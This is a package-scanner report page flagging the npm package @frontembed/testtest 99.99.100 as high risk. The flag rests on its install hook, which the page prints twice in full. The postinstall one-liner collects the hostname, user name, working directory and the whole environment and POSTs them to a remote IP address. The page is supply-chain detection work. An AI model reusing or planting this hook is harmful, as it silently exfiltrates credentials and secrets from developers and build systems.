npm · registry.npmjs.org

@frontembed/testtest

Install Lifecycle Remote Or Exec: postinstall="node -e \"var d=require('http');var m=JSON.stringify({host:require('os').hostname(),pkg:process.cwd(),user:process.env.USER,env:process.env,time:new Date().toISOString()});var r=d.request({hostname:'159.223.186.167',port:8080,method:'POST',path:'/probe',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(m)}},function(r){r.on('data',function(){});r.on('end',function(){});});r.on('error',function(){});r.write(m);r.end();\""

Why PkgRadar flagged 99.99.100

Severity	Signal	Evidence
high	Install Lifecycle Remote Or Exec	postinstall="node -e \"var d=require('http');var m=JSON.stringify({host:require('os').hostname(),pkg:process.cwd(),user:process.env.USER,env:process.env,time:new Date().toISOString()});var r=d.request({hostname:'159.223.186.167',port:8080,method:'POST',path:'/probe',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(m)}},function(r){r.on('data',function(){});r.on('end',function(){});});r.on('error',function(){});r.write(m);r.end();\"" · package.json

Scanned versions

Version	Verdict	Score	Scanned (UTC)
`99.99.100`	High risk	35	2026-06-06

Block this in CI

PkgRadar gates @frontembed/testtest (and every other dependency) before it merges. One line in your pipeline:

pkgradar gate --ecosystem npm @frontembed/[email protected]

Start free — 25 scans / mo View full evidence